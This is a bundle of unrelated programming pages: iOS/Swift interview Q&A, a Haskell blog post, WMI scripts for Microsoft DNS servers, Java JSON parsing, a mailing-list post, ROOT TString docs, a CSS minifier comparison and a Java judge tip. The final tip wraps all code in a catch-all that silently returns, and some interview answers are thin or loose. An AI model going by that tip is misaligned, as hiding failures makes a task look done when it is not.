The app thinning process can be tested via TestFlight by installing on various devices; the download size may vary per device.
XCode
91. How to call segue programmatically?
For a segue, we first have to set an identifier in the Attributes Inspector on the right side in Xcode.
Through that identifier, we can call it like performSegue(withIdentifier: "identifier", sender: nil)
92. Diff between get and post?
Answer: GET requests data from a server and passes parameters in the URL; it should have no side effects and can be cached. POST submits data to the server in the request body, is not cached, and is used for operations that change state.
93. Diff and use of nsurlconnection and nsurlsession?
An NSURLConnection object handles a single request and any follow-on requests. An NSURLSession object manages multiple tasks, each of which represents a single URL request and any follow-on requests. An NSURLConnection object lets you load the contents of a URL by providing a URL request object. The interface for NSURLConnection is sparse, providing only the controls to start and cancel asynchronous loads of a URL request.
94. Understanding Session Task Types
Answer: There are three types of concrete session tasks:
- URLSessionDataTask: Use this task for GET requests to retrieve data from servers to memory.
- URLSessionUploadTask: Use this task to upload a file from disk to a web service via a POST or PUT method.
- URLSessionDownloadTask: Use this task to download a file from a remote service to a temporary file location.
95. Background fetch
Answer: Used to perform a task when the app is in the background state. First enable Background fetch in Capabilities, then tell iOS how often you want background fetch to happen. This is usually done inside the didFinishLaunchingWithOptions method in AppDelegate.swift, like this:
application.setMinimumBackgroundFetchInterval(1800)
// or
UIApplication.shared.setMinimumBackgroundFetchInterval(UIApplication.backgroundFetchIntervalMinimum)
Then implement performFetchWithCompletionHandler in the app delegate to perform the required task.
96. OOps concepts with real life and iOS examples // all concepts in detail
96. Type Of notification in iOS?
Answer:
- Push / Remote notification
- Local notification
- Badge notification ( notification on Bell icon )
97. How Pushnotification works and what is limit for pushnotification?
Answer: Pushnotification link
98.
Diff between i++ and ++i
Answer: i++ will increment the value of i, but return the original value that i held before being incremented. i = 1; j = i++. (result: i = 2, j = 1) — first assign, then increment. ++i will increment the value of i, and then return the incremented value. i = 1; j = ++i. (result: i = 2, j = 2) — first increment, then assign.
99. What is init? Different type of initialiser
Answer:
Designated initializer: the primary initializer for a class. It must fully initialize all properties introduced by its class before calling a superclass initializer. A class can have more than one designated initializer.
Convenience initializer: a secondary initializer that must call a designated initializer of the same class. It is useful when you want to provide default values or other custom setup. A class does not require convenience initializers.
Failable initializer: an initializer declared as init? (or init!) that can return nil when initialization fails.
Required initialiser: consider the following example:
// required init
class classA {
    required init() {
        let a = 10
        print(a)
    }
}
class classB: classA {
    required init() {
        let b = 30
        print(b)
    }
}
//______________________
let objA = classA()
let objB = classB()
// prints: 10 30 10
//______________________
super.init()
The Swift initialization sequence has a little bit of difference from Objective-C. Given this base class:
class BaseClass {
    var value: String
    init() {
        value = "hello"
    }
}
and the subclass below:
class SubClass: BaseClass {
    var subVar: String
    let subInt: Int
    override init() {
        subVar = "world"
        subInt = 2015
        super.init()
        value = "hello world 2015" // optional, change the value of superclass
    }
}
The initialization sequence is:
- Initialize the subclass's var or let properties,
- Call super.init(), if the class has a superclass,
- Change values of the superclass, if you want to do that.
100. Types of properties
Answer: There are two types of properties in Swift: stored properties and computed properties.
Stored properties store values (constant or variable) as part of an instance or type, whereas computed properties don't have a stored value.
Stored Properties
Stored constant properties are defined with the 'let' keyword and stored variable properties are defined with the 'var' keyword.
- A stored property can provide a default value as part of its definition
- During initialization the user can initialize and modify the initial value
struct Number {
    var digits: Int
    let pi = 3.1415
}
var n = Number(digits: 12345)
n.digits = 67
print("\(n.digits)")
print("\(n.pi)")
Lazy stored property
Swift provides a flexible property called a 'lazy stored property', whose initial value is not calculated until the first time the property is used; it is marked with the 'lazy' keyword.
Computed Properties
Rather than storing values, computed properties provide a getter and an optional setter to retrieve and set other properties and values indirectly.
101. What is type inference in Swift?
Answer: Type inference means the compiler deduces the type of an expression from the value you provide, so you usually don't have to write type annotations (e.g. let name = "John" is inferred as String).
102. Type Alias
Answer: A type alias allows you to provide a new name for an existing data type in your program. It simply provides a new name for an existing type. The main purpose of typealias is to make our code more readable, and clearer in context for human understanding.
103. How to create a typealias?
Answer: For example, typealias StudentName = String allows StudentName to be used everywhere instead of String.
104. What is closure?
Answer: Closures are self-contained blocks of functionality that can be passed around and used in your code (unnamed functions), e.g. the completion handler in Alamofire.
105. @nonescaping and @escaping closure
Answer: Closure parameters are non-escaping by default; the closure will be executed within the function body. If you want the closure to escape (outlive the call), mark it as @escaping.
1. Non-escaping closures (you get the value before the scope ends): When passing a closure as a function argument, the closure gets executed within the function's body before control returns to the caller.
As execution ends, the passed closure goes out of scope and no longer exists in memory.
Lifecycle of a @nonescaping closure:
1. Pass the closure as a function argument during the function call.
2. The function does some additional work.
3. The function runs the closure.
4. The function returns.

2. @escaping closures (used when the closure must run after the scope ends, e.g. a few seconds later):
When you pass a closure as a function argument, the closure is preserved to be executed later; the function's body runs and returns. After the call ends, the passed closure still exists in memory until it finally runs.
There are two common ways a closure escapes:
- Storage: you preserve the closure in storage that outlives the calling function, e.g. while waiting for an API response.
- Asynchronous execution: you execute the closure asynchronously on a dispatch queue; the queue holds the closure in memory for you, to be used in the future. In this case you have no idea exactly when the closure will run.

106. Sandbox
Answer: Every iOS app runs in its own sandbox: a set of directories it can read and write, isolated from other apps' data.

107. Defer in Swift
Answer: Order of execution with multiple defer statements — if multiple defer statements appear in the same scope, they are executed in the reverse of the order they appear (LIFO). The last defined statement is the first to be executed, as demonstrated by the following example, which prints the numbers in logical order.

func printStringNumbers() {
    defer { print("1") }
    defer { print("2") }
    defer { print("3") }
    print("4")
}

/// Prints 4, 3, 2, 1

108. Higher order functions
Answer: Swift's Array type has a few methods that are higher order functions: sorted, map, filter, and reduce.
Sorted: if we call sorted on an array, it returns a new array sorted in ascending order,
like sorting an array of numbers.
Map: similar to sorted in that it iterates through the array it is called on, but instead of sorting it transforms each element of the array based on the closure passed to the method, like changing an array of numbers into an array of strings.

let houseName: [String] = ["starks", "lanniesters", "targaryens", "baratheon", "arryn"]
let mappedHouseCount = houseName.map { $0.count }
// Character count of each element in houseName: [6, 11, 10, 9, 5]

Filter: filters the array according to a condition, e.g. from an array of numbers get the numbers less than 5.
Reduce: the reduce function allows you to combine all the elements in an array, e.g. combine the numbers of an array and return them as a string.
compactMap(): compactMap is the same as map but with optional-handling capability.

let compactMapValue = place.compactMap { $0 }
print(compactMapValue)
// here the optionals are removed: ["winterfell", "highgarden", "Vale", "iron islands", "essos", "andalos"]

compactMap is also used to filter out nil values:

let arrayWithNil: [String?] = ["eleven", nil, "demogorgon", nil, "max", nil, "lucus", nil, "dustin"]
let filteredNilArray = arrayWithNil.compactMap { $0 }
print(filteredNilArray)
print("Array with nil = \(arrayWithNil.count) and without nil count = \(filteredNilArray.count)")

The printed values are:
["eleven", "demogorgon", "max", "lucus", "dustin"]
Array with nil = 9 and without nil count = 5

109. Diff. between map and flatMap
Answer: map transforms an array of values into an array of other values; flatMap does the same thing, but also flattens a result of nested collections into a single array.

let scoreByName = ["henry": [0, 5, 8], "John": [2, 5, 8]]
let mapped = scoreByName.map { $0.value }
print(mapped) // [[0, 5, 8], [2, 5, 8]] - array of arrays
let flatMapped = scoreByName.flatMap { $0.value }
// [0, 5, 8, 2, 5, 8] - flattened to a single array

110. What is Codable?
Answer: Codable is a protocol specifically for archiving and unarchiving data, which is a fancy way of saying "converting objects into plain text and back again."

111. What is JSONEncoder?
Answer: This part of the process is powered by a type called JSONEncoder. Its job is to take something that conforms to Codable and send that object back as JavaScript Object Notation (JSON) – the name implies it's specific to JavaScript, but in practice we all use it because it's so fast and simple.

112. What is stack and heap?
Answer: The stack holds value types and call frames and is managed automatically; the heap holds reference types (class instances), whose lifetime is managed by reference counting.

113. What is the difference between aspect fill and aspect fit when displaying an image?
Answer: Aspect fit ensures all parts of the image are visible, whereas aspect fill may crop the image to ensure it takes up all available space.

114. What steps do you follow to identify and resolve crashes?
Answer: By using assert, precondition and fatalError in Swift.

SwiftUI

What is "some" in SwiftUI?
var body: some View defines a new computed property called body, which has an interesting type: some View. This means it will return something that conforms to the View protocol, but that extra some keyword adds an important restriction: it must always be the same kind of view being returned – you can't sometimes return one type of thing and other times return a different type of thing. We'll look at this feature more shortly, but for now just remember that it means "one specific sort of view must be sent back from this property."
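A small round-trip sketch tying Codable and JSONEncoder together (the Person type here is made up for illustration):

```swift
import Foundation

struct Person: Codable {
    var name: String
}

// Encode: Codable value -> JSON text
let encoder = JSONEncoder()
let data = try! encoder.encode(Person(name: "Alex"))
print(String(data: data, encoding: .utf8)!) // {"name":"Alex"}

// Decode: JSON text -> Codable value
let decoder = JSONDecoder()
let back = try! decoder.decode(Person.self, from: data)
print(back.name) // Alex
```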
https://sandeshsardardotcom.wordpress.com/2018/04/20/ios-interview-questions/
Overloaded:Unit is the third and last of the new features in the recent overloaded-0.2.1 release. I wrote about Overloaded:Categories and Overloaded:Do previously. The overloaded package uses source plugins to reinterpret syntax in different ways. Overloaded:Unit is (hopefully) clearly a tongue-in-cheek feature.

What can we do? We can overload what () means. Without any overloading we have () :: (). With

{-# OPTIONS_GHC -fplugin=Overloaded #-}

we can make that symbol anything. The most sensible overloading is into boring. You can specify that by

{-# OPTIONS_GHC -fplugin=Overloaded -fplugin-opt=Overloaded:Unit=Data.Boring.boring #-}

What is boring? Haddock tells us. There is also a law.

-- | 'Boring' types which contains one thing, also
-- 'boring'. There is nothing interesting to be gained by
-- comparing one element of the boring type with another,
-- because there is nothing to learn about an element of the
-- boring type by giving it any of your attention.
--
-- /Boring Law:/
--
-- @
-- 'boring' == x
-- @
--
class Boring a where
  boring :: a

The above is a "proper implementation" of Conor McBride's StackOverflow answer to the "What does () mean in Haskell" question. The answer starts with

() means "Boring".

So don't blame me for Overloaded:Unit, it wasn't my idea :)

The overloaded library by default makes () mean nil. Lispers may agree with that choice. Another choice is to make () mean def from the lawless Default type class. As def is used as an ad-hoc value for default options, we could write

() & axis_line_style . line_width .~ 2

or

() { _line_width = 2
   , _line_color = red
   }

Is that a good idea? Who am I to judge!

When you work on compiler internals, or more generally on the implementation of some specification, you often enough learn stuff you didn't think about. Formalization makes corner cases more visible. One example is:

Prelude> ( )
()

Try it in your GHCi prompt if you don't believe me. This leads to a question: why has unit been given special syntax in the first place?
Why couldn't we have had

data Unit = Unit

Then there would have been a StackOverflow question for Conor to answer! And we could use boring, def or Unit. Those would be "overloadable" with custom preludes, i.e. a basic language feature: swapping imports.

We can think of () as a 0-tuple. But the syntax is not consistent:

()      -- 0-tuple i.e. unit
(x)     -- just x i.e. NOT 1-tuple
(x,y)   -- 2-tuple i.e. pair
(x,y,z) -- 3-tuple i.e. triple

Yet, there is a 1-tuple in GHC. Kind-of.

Prelude Language.Haskell.TH> let x = 'x'
x :: Char
Prelude Language.Haskell.TH> print $( conE (tupleDataName 1) `appE` [| x |] )

<interactive>:12:7: error:
    • Exception when trying to run compile-time code:
        tupleDataName 1
      CallStack (from HasCallStack):
        error, called at libraries/template-haskell/Language/Haskell/TH/Syntax.hs:1236:19 in template-haskell:Language.Haskell.TH.Syntax
      Code: conE (tupleDataName 1) `appE` [| x |]
    • In the untyped splice: $(conE (tupleDataName 1) `appE` [| x |])

I haven't tried doing that using GHC internals, i.e. whether one can generate panics by creating 1-tuples (i.e. boxes), or whether it will "just work". data Box a = Box a is a valid data type - and sometimes even useful. We cannot use a 1-tuple for it - because there isn't syntax for one, yet we have () for the 0-tuple. Such inconsistencies.

We need some syntax for tuples, however. The parentheses delimit where a tuple starts and ends. (1, 'x', "foo") is clearly a triple. Without parentheses, 1, 'x', "foo" would be ambiguous: that could be either a triple or nested pairs - three options! One could use ⟨ and ⟩ to delimit tuples, leaving ( and ) only for grouping. But using Unicode for something as central as tuples is not a good idea. So overloading parentheses is probably the least bad option. But not great.

The very evil interview question would be to ask to list all the ways the dot is overloaded (or will be overloaded) in GHC Haskell. The "will be" are the Local Do and RecordDotSyntax proposals, but we have plenty already.
Poor dot, stretched for about everything. Hot take: disallow . as an operator, making it punctuation, like comma or semicolon. It feels like it would be easier to come up with a new function-composition operator than to try to disambiguate the ever-increasing dot usage.

TupleSections. I don't know how divided the community is about these. I think that (left,) and (,right) sections are somewhat OK, even though I avoid them. The (,) is kind-of an infix operator (which it isn't). Triples and bigger tuples on the other hand...

("foo",,,True) :: b -> c -> ([Char], b, c, Bool)

for me this looks like a syntax error. But on the other hand, if you are OK with that syntax, it definitely should be overloadable for arbitrary data types; why stop with tuples?

data Foo = Foo String Int Char Bool deriving (Generic, ...)

("foo",,,True) :: Char -> Bool -> Foo

Wouldn't that be awesome? Stay tuned for Overloaded:TupleSections.
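The custom-prelude idea sketched in the post — a hand-rolled unit type with a Boring instance, no plugin involved — would look roughly like this (a toy standalone module, not the overloaded plugin itself):

```haskell
module Main where

-- A hand-rolled unit type, as the post wishes Haskell had.
data Unit = Unit
  deriving (Show, Eq)

-- The Boring class from the post: types with exactly one value.
class Boring a where
  boring :: a

instance Boring Unit where
  boring = Unit

instance Boring () where
  boring = ()

main :: IO ()
main = do
  print (boring :: Unit) -- Unit
  print (boring :: ())   -- ()
```

Swapping which Unit is in scope is then just an import change — "overloadable" in the most pedestrian sense.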
http://oleg.fi/gists/posts/2020-05-11-overloaded-unit.html
There are close to 50 different settings that can be configured on a Microsoft DNS server. They range from default scavenging and logging settings to settings that customize the DNS server's behavior, such as how zone transfers will be sent to secondaries and whether to round-robin multiple A record responses. The DNS provider is mapped to the root\MicrosoftDNS namespace. A DNS server is represented by an instance of the MicrosoftDNS_Server class, which is derived from the CIM_Service class. Table 27-1 contains all the property methods available in the MicrosoftDNS_Server class. The MicrosoftDNS_Server class also provides a few methods to initiate certain actions on the DNS server. Perhaps the two most useful are StartService and StopService, which allow you to start and stop the DNS service. Table 27-2 contains the list of methods available on the MicrosoftDNS_Server class.

The first step in programmatically managing your DNS server configuration is to see what settings you currently have and determine whether any need to be modified. With WMI, it is really easy to list all properties for the server. The following example shows how to do it:

Set objDNS = GetObject("winMgmts:root\MicrosoftDNS")
Set objDNSServer = objDNS.Get("MicrosoftDNS_Server.Name="".""")
WScript.Echo objDNSServer.Properties_.Item("Name") & ":"
For Each objProp In objDNSServer.Properties_
    If IsArray(objProp.Value) Then
        For i = LBound(objProp.Value) To UBound(objProp.Value)
            WScript.Echo " " & objProp.Name & "(" & i & ") = " & objProp.Value(i)
        Next
    Else
        WScript.Echo " " & objProp.Name & " = " & objProp.Value
    End If
Next

After getting a WMI object for the DNS provider (root\MicrosoftDNS), we get a MicrosoftDNS_Server object by looking for the "." instance. Since there can only be one instance of MicrosoftDNS_Server running on any given computer, we do not need to worry about multiple objects. After getting a MicrosoftDNS_Server object, we iterate through all the properties of the object and print each one out. Note that we have added special checks for values that contain arrays so that each element of the array is printed. In that case, we use LBound and UBound to iterate over all the values of the array.
Now that we can see what values have been set on our DNS server, we may want to change some of them. To do so is very straightforward. We simply need to set the property method (e.g., EventLogLevel) to the correct value. This example shows how it can be done:

on error resume next
Set objDNS = GetObject("winMgmts:root\MicrosoftDNS")
Set objDNSServer = objDNS.Get("MicrosoftDNS_Server.Name="".""")
WScript.Echo objDNSServer.Name & ":"
objDNSServer.EventLogLevel = 4
objDNSServer.LooseWildcarding = True
objDNSServer.MaxCacheTTL = 900
objDNSServer.MaxNegativeCacheTTL = 60
objDNSServer.AllowUpdate = 3
objDNSServer.Put_
if Err then
    WScript.Echo " Error occurred: " & Err.Description
else
    WScript.Echo " Change successful"
end if

Note that we had to call Put_ at the end. If we didn't, none of the changes would have been committed. After making changes to DNS settings, you typically will need to restart the DNS service for them to take effect. We can utilize the StopService and StartService methods as shown in the following example:

on error resume next
Set objDNS = GetObject("winMgmts:root\MicrosoftDNS")
Set objDNSServer = objDNS.Get("MicrosoftDNS_Server.Name="".""")
objDNSServer.StopService
if Err Then
    WScript.Echo "StopService failed: " & Err.Description
    WScript.Quit
end if
objDNSServer.StartService
if Err Then
    WScript.Echo "StartService failed: " & Err.Description
    WScript.Quit
end if
WScript.Echo "Restart successful"

Building on the examples we've used so far in this chapter, we can now move forward with writing a robust DNS server configuration check script. A configuration check script can be very important, especially in large environments where you may have many DNS servers. Unless you have a script that routinely checks the configuration on all of your DNS servers, it is very likely that those servers will not have an identical configuration.
If this is true, when problems pop up over time, you may end up spending considerably more time troubleshooting because of the discrepancies between the servers. To accomplish the configuration checking, we will store each setting in a VBScript Dictionary object. For those coming from other languages such as Perl, a Dictionary object is the VBScript analog of a hash or associative array. It is not extremely flexible but works well in situations such as this. Another option would be to store the settings in a text file and read them into a Dictionary object when the script starts up. Example 27-1 contains the configuration check code.

option explicit
on error resume next

Dim arrServers
Dim strUsername, strPassword
Dim dicDNSConfig

' Array of DNS servers to check
arrServers = Array("dns1.mycorp.com","dns2.my")

' Dictionary of settings to enforce
Set dicDNSConfig = CreateObject("Scripting.Dictionary")
dicDNSConfig.Add "AllowUpdate", 1
dicDNSConfig.Add "LooseWildCarding", True
dicDNSConfig.Add "MaxCacheTTL", 900
dicDNSConfig.Add "MaxNegativeCacheTTL", 60
dicDNSConfig.Add "EventLogLevel", 0
dicDNSConfig.Add "StrictFileParsing", True
dicDNSConfig.Add "DisableAutoReverseZones", True

Dim arrDNSConfigKeys
arrDNSConfigKeys = dicDNSConfig.keys

Dim objLocator
Set objLocator = CreateObject("WbemScripting.SWbemLocator")

Dim x, y, boolRestart
For x = LBound(arrServers) To UBound(arrServers)
    boolRestart = False
    WScript.Echo arrServers(x)

    Dim objDNS, objDNSServer
    Set objDNS = objLocator.ConnectServer(arrServers(x), "root\MicrosoftDNS", _
                                          strUserName, strPassword)
    Set objDNSServer = objDNS.Get("MicrosoftDNS_Server.Name="".""")

    For y = 0 To dicDNSConfig.Count - 1
        Dim strKey
        strKey = arrDNSConfigKeys(y)
        WScript.Echo " Checking " & strKey
        If dicDNSConfig.Item(strKey) <> objDNSServer.Properties_.Item(strKey) Then
            objDNSServer.Properties_.Item(strKey).value = dicDNSConfig(strKey)
            objDNSServer.Put_
            boolRestart = True
            If Err Then
                WScript.Echo " Error setting " & strKey & " : " & Err.Description
                WScript.Quit
            Else
                WScript.Echo " " & strKey & " updated"
            End If
        End If
    Next

    If boolRestart Then
        objDNSServer.StopService
        If Err Then
            WScript.Echo "StopService failed: " & Err.Description
            WScript.Quit
        End If
        objDNSServer.StartService
        If Err Then
            WScript.Echo "StartService failed: " & Err.Description
            WScript.Quit
        End If
        WScript.Echo "Restarted"
    End If
    WScript.Echo ""
Next

Besides the use of the Dictionary object, most of the script is a combination of the other three examples shown so far in this chapter. We added a server array so that you can check multiple servers at once. Then for each server, the script simply checks each key in the Dictionary object to see whether its value matches that on the DNS server. If not, it modifies the server and commits the change via Put_. After it's done looping through all the settings, it restarts the DNS service if a change has been made to its configuration. If a change has not been made, it proceeds to the next server. One enhancement that would make the process even more automated would be to dynamically query the list of DNS servers instead of hardcoding them in an array. You simply would need to query the NS records for one or more zones that your DNS servers are authoritative for. As long as an NS record is added for each new name server, the script would automatically pick it up in subsequent runs. Later in the chapter, we will show how to query DNS with the DNS provider.
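A sketch of that enhancement using the provider's MicrosoftDNS_NSType class follows. The zone name is a placeholder and the property names should be checked against the provider documentation for your Windows version; treat this as illustrative rather than tested:

```vbscript
' ASSUMPTION: "mycorp.com" is an illustrative zone name; NSHost is the
' documented property of MicrosoftDNS_NSType holding the name server's host.
Dim objDNS, colNS, objNS, arrServers(), i
Set objDNS = GetObject("winMgmts:root\MicrosoftDNS")
Set colNS = objDNS.ExecQuery( _
    "SELECT * FROM MicrosoftDNS_NSType WHERE ContainerName = 'mycorp.com'")

i = 0
ReDim arrServers(colNS.Count - 1)
For Each objNS In colNS
    arrServers(i) = objNS.NSHost   ' the name server this NS record points at
    i = i + 1
Next
```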
http://etutorials.org/Server+Administration/Active+directory/Part+III+Scripting+Active+Directory+with+ADSI+ADO+and+WMI/Chapter+27.+Manipulating+DNS/27.2+Manipulating+DNS+Server+Configuration/
In Java, how can I parse JSON text to get the value of variables like post_id? Here is my JSON text:

{
  "page": {
    "name": "tommas"
  },
  "posts": [
    {
      "post_id": "123456789012_123456789012",
      "actor_id": "1234567890",
      "name": "Alex",
      "message": "Nice!",
      "likes_count": "3",
      "time": "1234567890"
    }
  ]
}

JSON stands for JavaScript Object Notation. It is simply a format in which you can transfer data from client to server and vice versa. In the early days of web development we worked with HTML and later with CSS; as the web evolved we had more dynamic pages, which meant different languages operating on the two ends, and the complex strings being communicated needed to be readable on both. That is where JSON came in: a lightweight, text-based, language-independent data-exchange format.

Parsing JSON in Java
Assume we want to parse some data sent from the server on the client side. Passing JSON around is easy if we are operating in JavaScript, but in another language (Java in our case) we need a library to convert text to and from JSON on either side. Libraries such as Gson, Jackson and org.json are all available and can convert Java objects into JSON and vice versa. We will use the org.json library here:

import org.json.*;

JSONObject obj = new JSONObject(" .... ");
String name = obj.getJSONObject("page").getString("name");

JSONArray arr = obj.getJSONArray("posts");
for (int i = 0; i < arr.length(); i++) {
    String id = arr.getJSONObject(i).getString("post_id");
    ......
}

Let's assume you have a class called Person with just name as an attribute:

private class Person {
    public String name;

    public Person(String name) {
        this.name = name;
    }
}

For serialization/de-serialization of objects with Gson, you can do this:

Gson g = new Gson();
Person person = g.fromJson("{\"name\": \"John\"}", Person.class);
System.out.println(person.name); //John
System.out.println(g.toJson(person)); // {"name":"John"}

If you want to get a single attribute out, you can do it easily with the Google library as well:

JsonObject jsonObject = new JsonParser().parse("{\"name\": \"John\"}").getAsJsonObject();
System.out.println(jsonObject.get("name").getAsString());

But if you don't need object de-serialization and simply want an attribute, you can try org.json:

JSONObject obj = new JSONObject("{\"name\": \"John\"}");
System.out.println(obj.getString("name"));

Or with Jackson:

ObjectMapper mapper = new ObjectMapper();
Person user = mapper.readValue("{\"name\": \"John\"}", Person.class);
System.out.println(user.name);
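If you just need one field and cannot add a library, a quick-and-dirty extraction is possible. This is not a real JSON parser — it breaks on escaped quotes and nesting — but it illustrates the lookup the libraries above do properly:

```java
public class PostIdExtractor {
    // Naive lookup of a string field's value: finds "key" and returns the
    // quoted token that follows the colon. For demonstration only.
    static String extract(String json, String key) {
        int k = json.indexOf("\"" + key + "\"");
        if (k < 0) return null;
        int colon = json.indexOf(':', k);
        int start = json.indexOf('"', colon + 1) + 1;
        int end = json.indexOf('"', start);
        return json.substring(start, end);
    }

    public static void main(String[] args) {
        String json = "{\"posts\": [{\"post_id\": \"123456789012_123456789012\", \"name\": \"Alex\"}]}";
        System.out.println(extract(json, "post_id")); // 123456789012_123456789012
    }
}
```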
https://intellipaat.com/community/501/how-to-parse-json-in-java
Lars Marius Garshol wrote:
>
> ...
>
> I have been wondering why we even have Attribute nodes in the DOM tree
> at all. They are mainly useful for representing entity references in
> attribute values, something that is very rarely useful. :-)

Attributes can also be independently addressed as objects in XPath, XSLT, Schematron, etc.

> So I think there would be definite performance benefits (in terms of
> both speed and memory use) in keeping a dictionary of names -> string
> values instead of names -> nodes.

I did that in older versions of minidom. Then I implemented namespaces and it started to get really hairy. You need to be able to look things up by tagname and by localname/URI prefix. Then you need to be able to get from tagnames to localname/URI and back in case you need to delete or update an attribute. The right-hand side becomes some kind of a tuple that you need to split, and you are almost back to objects again... ugh. In general, namespaces make XML a lot harder to work with. A lot harder. Really.

So I eventually backed it out on the argument that getting it right but inefficient for Python 1.6 was more important than being tricky but efficient. The idea is still good but it requires more thought.

--
Paul Prescod - ISOGEN Consulting Engineer
speaking for himself
Floggings will continue until morale improves.
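The node-versus-value duality discussed here is still visible in minidom's public API: an attribute is reachable both as a plain string and as an addressable Attr node, and the namespace lookup takes a (URI, localname) pair — the part Paul calls hairy. A small present-day illustration:

```python
from xml.dom.minidom import parseString

doc = parseString('<root a="1" xmlns:ns="urn:x" ns:b="2"/>')
elem = doc.documentElement

# Dictionary-style access: name -> string value
print(elem.getAttribute("a"))             # 1

# Node-style access: name -> Attr object
attr = elem.getAttributeNode("a")
print(attr.name, attr.value)              # a 1

# Namespace-aware lookup needs (URI, localname)
print(elem.getAttributeNS("urn:x", "b"))  # 2
```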
https://mail.python.org/pipermail/xml-sig/2000-June/002583.html
In what follows, fCap is the length of the underlying representation vector. Hence, the capacity for a null-terminated string held in this vector is fCap-1. The variable fSize is the length of the held string, excluding the terminating null. The algorithms make no assumptions about whether internal strings hold embedded nulls. However, they do assume that any string passed in as an argument that does not have a length count is null terminated and therefore has no embedded nulls. The internal string is always null terminated.

Copy a TSubString in a TString.
Special constructor to initialize with the concatenation of a1 and a2.
Private member function returning an empty string representation of size capacity and containing nchar characters.
Assign a TSubString substr to TString.
Return a case-insensitive hash value (endian independent).
Calculates hash index from any char string. (static function)
    TString::Hash(string, nstring);
    For int:     i = TString::Hash(&intword, sizeof(int));
    For pointer: i = TString::Hash(&pointer, sizeof(void*));
    V.Perev
Return a substring of self stripped at beginning and/or end.
Check to make sure a string index is in range.
Calculate a nice capacity greater than or equal to newCap.
Make self a distinct copy with capacity of at least tot, where tot cannot be smaller than the current length. Preserve previous contents.
Read string from I/O buffer.
Read TString object from buffer. Simplified version of TBuffer::ReadObject (does not keep track of multiple references to the same string). We need to have it here because TBuffer::ReadObject can only handle descendants of TObject.
Write TString object to buffer. Simplified version of TBuffer::WriteObject (does not keep track of multiple references to the same string). We need to have it here because TBuffer::ReadObject can only handle descendants of TObject.
Set default initial capacity for all TStrings. Default is 15.
Set default resize increment for all TStrings. Default is 16.
Set maximum space that may be wasted in a string before doing a resize. Default is 15.
Return sub-string of string starting at start with length len.
Return floating-point value contained in string. Examples of valid strings are:
    64320
    64 320
    6 4 3 2 0
    6.4320
    6,4320
    6.43e20
    6.43E20
    6,43e20
    6.43e-20
    6.43E-20
    6,43e-20
This function is used to isolate sequential tokens in a TString. These tokens are separated in the string by at least one of the characters in delim. The returned array contains the tokens as TObjString's. The returned array is the owner of the objects, and must be deleted by the user.
Formats a string using a printf-style format descriptor. Existing string contents will be overwritten.
Formats a string using a printf-style format descriptor. Existing string contents will be overwritten.

{ char s[32]; sprintf(s, "%ld", i); return operator+=(s); }
{ char s[32]; sprintf(s, "%lu", i); return operator+=(s); }
{ return ReplaceAll(s1.Data(), s1.Length(), s2.Data(), s2.Length()); }
{ return ReplaceAll(s1.Data(), s1.Length(), s2, s2 ? strlen(s2) : 0); }
{ return ReplaceAll(s1, s1 ? strlen(s1) : 0, s2.Data(), s2.Length()); }
{ return ReplaceAll(s1, s1 ? strlen(s1) : 0, s2, s2 ? strlen(s2) : 0); }
{ return GetPointer()[i]; }
{ return GetPointer()[i]; }
{ AssertElement(i); return GetPointer()[i]; }
{ AssertElement(i); return GetPointer()[i]; }
{ return (s + (kAlignment-1)) & ~(kAlignment-1); }
{ return Bool_t(fRep.fShort.fSize & kShortMask); }
{ fRep.fShort.fSize = (unsigned char)(s << 1); }
{ return fRep.fShort.fSize >> 1; }
{ fRep.fLong.fSize = s; }
{ return fRep.fLong.fSize; }
{ IsLong() ? SetLongSize(s) : SetShortSize(s); }
{ return fRep.fLong.fCap & ~kLongMask; }
{ fRep.fLong.fData = p; }
{ return fRep.fLong.fData; }
{ return fRep.fLong.fData; }
{ return fRep.fShort.fData; }
{ return fRep.fShort.fData; }
{ return IsLong() ? GetLongPointer() : GetShortPointer(); }
{ return IsLong() ? GetLongPointer() : GetShortPointer(); }
Type conversion
{ return GetPointer(); }
{ return (IsLong() ? GetLongCap() : kMinCap) - 1; }
http://root.cern.ch/root/html530/TString.html
Comparing YUI Compressor and slimmer
17 November 2009
Python

YUI Compressor apparently supports compressing CSS. Cool! I had to try it, and what's even more cool is that it's the only other CSS minifier/compressor that doesn't choke on CSS hacks (the ones I tried). The only other one being my very own slimmer. So, let's see what the difference is.

Running the YUI Compressor 10 times on a relatively small file takes 0.3 seconds on average. Running the same with Python 2.6 and slimmer.css_slimmer takes 0.1 seconds on average. I suspect most of the YUI time is spent loading the jar file rather than actually running the compression. Here's how I ran yuicompressor:

$ time java -jar yuicompressor-2.4.2.jar --type css tricky.css > compressed.css

And for slimmer I first had to write a script:

from slimmer import css_slimmer
import sys
print css_slimmer(open(sys.argv[1]).read())

And run it like this:

$ time python slim.py tricky.css > slimmed.css

If part of a build system, 0.3 or 0.1 seconds don't matter. YUI Compressor has the added advantage that it's popular, which means many eyes on it for submitting bug reports and patches. However, if you're already in Python and don't want to depend on manually downloading the jar file and running a subprocess, then slimmer is probably a better choice.

Comments

I think you left out Google's Closure compiler, which explicitly states "The Closure Compiler reduces the size of your JavaScript files and makes them more efficient, helping your application to load faster and reducing your bandwidth needs."

Whoops, you're talking about CSS, not JavaScript. Should have read the post. D'oh.

Hey Peter - might want to fix the note on slimmer's PyPI page that proudly claims "still maintained in 2008." It no longer gives the impression of up-to-dateness it might once have done ;-)

Thanks for noticing. Done

Would you post the "tricky.css"?
Wonder if yuicompressor and slimmer will actually cope with any CSS hack out there (especially syntactically invalid ones... ;). That would be nice, thanks
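For the curious: css_slimmer is essentially a series of regular-expression passes. A toy version — my sketch, not the actual slimmer code — conveys the idea:

```python
import re

def toy_css_slimmer(css):
    """Whitespace/comment stripping in the spirit of slimmer (illustrative only)."""
    css = re.sub(r"/\*.*?\*/", "", css, flags=re.S)  # drop comments
    css = re.sub(r"\s+", " ", css)                   # collapse whitespace runs
    css = re.sub(r"\s*([{};:,])\s*", r"\1", css)     # tighten around punctuation
    return css.strip()

print(toy_css_slimmer("body {\n  color : red;  /* hack */\n}"))
# body{color:red;}
```

A real minifier has to be more careful than this (strings, url() values, and the CSS hacks discussed above), which is exactly why choking on hacks is the common failure mode.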
http://www.peterbe.com/plog/comparing-yui-compressor-and-slimmer
To all who are getting NZEC, try using this format in Java:

import java.io.*;
import java.util.*;

public class Main {
    public static void main(String[] args) throws IOException {
        try {
            //Your Solve
        } catch(Exception e) {
            return;
        }
    }
}

